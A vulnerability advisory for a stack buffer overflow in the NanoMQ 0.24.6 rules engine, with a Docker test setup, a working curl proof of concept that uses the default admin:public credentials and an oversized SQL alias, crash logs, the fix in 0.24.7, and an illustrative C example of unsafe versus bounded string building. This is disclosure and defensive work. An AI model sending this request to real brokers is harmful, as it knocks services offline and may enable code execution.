NanoMQ 0.24.6 Remote Buffer Overflow
NanoMQ Rules Engine Remote Buffer Overflow
=======
Summary
=======
A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a Denial of Service (DoS) and potentially achieve Remote Code Execution (RCE). The vulnerability requires admin privileges, but use of default credentials (admin:public) may be common, lowering the barrier to access and increasing the practical impact.
Target: NanoMQ (emqx/nanomq:latest-full image tested)
Version Affected: ≤ 0.24.6
============
How It Works
============
The vulnerability is located in the Rule Engine's SQLite integration. When a user creates a rule with a SQLite action, NanoMQ dynamically constructs a CREATE TABLE SQL statement from the rule's fields. The flaw stems from unsafe use of string copy functions when building that statement.
For the vulnerability to be exploitable, two conditions must be met:
1. HTTP Server Must Be Enabled: The NanoMQ HTTP server must be active to expose the /api/v4/rules endpoint.
2. Rule Engine Must Be Compiled: The NanoMQ binary must be compiled with the Rule Engine feature enabled (-DENABLE_RULE_ENGINE=ON). This is not the default for release binaries.
However, note that the popular emqx/nanomq:latest-full Docker image, which has over 100,000 downloads, ships with the rule engine enabled, making it vulnerable as soon as the HTTP server is enabled.
=======
Testing
=======
Triggering the buffer overflow requires sending a POST request to the /api/v4/rules endpoint. The request must contain a JSON payload with a long alias in the rawsql field.
===========
Environment
===========
docker run -d --name nanomq-test -p 8081:8081 -e NANOMQ_HTTP_SERVER_ENABLE=true emqx/nanomq:latest-full
===
PoC
===
curl -u admin:public -X POST http://localhost:8081/api/v4/rules -H "Content-Type: application/json" -d "{\"rawsql\": \"SELECT qos as $(perl -e 'print \"A\" x 180' ) FROM \\\"test/topic\\\"\", \"actions\": [{\"name\": \"sqlite\", \"params\": {\"table\": \"table\"}}]}"
After sending the request, the NanoMQ instance will crash, and the logs will show buffer overflow detection.
====
Logs
====
*** buffer overflow detected ***: terminated
WARN /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:1288 broker: NanoMQ (ver 0.24.6) Serving HTTP Server on http://(null):8081
NanoMQ Broker is started successfully!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: near "table": syntax error
ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: (null)
ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
ERROR /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:114 sig_handler: signal signumber: 6 received!
======
Impact
======
This vulnerability may lead to:
- Denial of Service (DoS): A remote attacker can crash the NanoMQ broker with a single request.
- Remote Code Execution (RCE): A sophisticated attacker could potentially craft a payload to exploit the buffer overflow and execute arbitrary code.
==========
Mitigation
==========
The vulnerability was addressed in NanoMQ version 0.24.7 by replacing an unsafe strcpy() function with snprintf(). This ensures that all string operations are bounds-checked, preventing the buffer overflow.
The fix was introduced in this commit:
- https://github.com/nanomq/nanomq/commit/f6f5d1d2c01cbd56212924a1dfb59152ac63cc81
Users can upgrade to NanoMQ version 0.24.7 or later to mitigate this vulnerability.
Other mitigations include disabling the HTTP server or the Rules Engine, and replacing the default admin:public credentials noted above.
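To illustrate the bug class described in How It Works and the snprintf() fix described above, the following C example, written for this advisory and not taken from the NanoMQ source, builds a CREATE TABLE statement from an attacker-controlled alias in two ways. The statement template, the buffer size SQL_BUF_LEN and the function names are assumptions chosen for the example, not NanoMQ's actual values. The unsafe builder shows the strcpy()/strcat() pattern that overruns a fixed stack buffer; the hardened builder bounds every write with snprintf() and reports truncation so the caller can reject oversized input instead of silently producing a mangled statement.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Fixed-size statement buffer; the value is an assumption for this example. */
#define SQL_BUF_LEN 128

/* Vulnerable pattern, shown for contrast only (constructed, not NanoMQ's code).
 * strcpy()/strcat() stop at the source's NUL, not at the destination's end,
 * so an alias longer than the remaining capacity writes past `out`.
 * With _FORTIFY_SOURCE the process aborts with
 * "*** buffer overflow detected ***", which is the crash in the advisory's
 * logs; without it the stack is silently corrupted. */
static void build_create_table_unsafe(char *out, const char *table,
                                      const char *alias)
{
    strcpy(out, "CREATE TABLE IF NOT EXISTS ");
    strcat(out, table);
    strcat(out, " (");
    strcat(out, alias);
    strcat(out, " TEXT);");
}

/* Hardened pattern: snprintf() never writes more than out_len bytes
 * (including the terminating NUL) and returns the length the full statement
 * would have needed. Returns true only when the statement fit completely;
 * a false return means the input was too long (or an encoding error occurred)
 * and the caller should reject the rule rather than use `out`. */
static bool build_create_table_safe(char *out, size_t out_len,
                                    const char *table, const char *alias)
{
    int n = snprintf(out, out_len,
                     "CREATE TABLE IF NOT EXISTS %s (%s TEXT);", table, alias);
    return n >= 0 && (size_t)n < out_len;
}

/* Convenience check a request handler can run before building anything:
 * does this alias fit the fixed buffer together with the template and table? */
static bool alias_fits(const char *table, const char *alias)
{
    char scratch[SQL_BUF_LEN];
    return build_create_table_safe(scratch, sizeof scratch, table, alias);
}

int main(void)
{
    char buf[SQL_BUF_LEN];

    /* Short alias: both builders produce the same statement. */
    build_create_table_unsafe(buf, "table", "qos_alias");
    printf("unsafe (short alias): %s\n", buf);
    if (build_create_table_safe(buf, sizeof buf, "table", "qos_alias"))
        printf("safe   (short alias): %s\n", buf);

    /* 180-byte alias, the same length as the advisory's PoC. The safe builder
     * truncates and reports failure; the unsafe builder is deliberately not
     * called here because it would overrun `buf`. */
    char long_alias[181];
    memset(long_alias, 'A', 180);
    long_alias[180] = '\0';
    printf("safe   (180-byte alias) accepted: %s\n",
           build_create_table_safe(buf, sizeof buf, "table", long_alias)
               ? "yes" : "no");
    printf("alias_fits(180-byte alias): %s\n",
           alias_fits("table", long_alias) ? "yes" : "no");
    return 0;
}
```

The important detail is that the snprintf() return value is checked: bounding the copy alone turns the crash into a truncated SQL statement, while checking the return value lets the handler reject the rule with an error instead of executing a statement the user never wrote.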
Jeremy Brown (jbrown3264/gmail), Jan 2026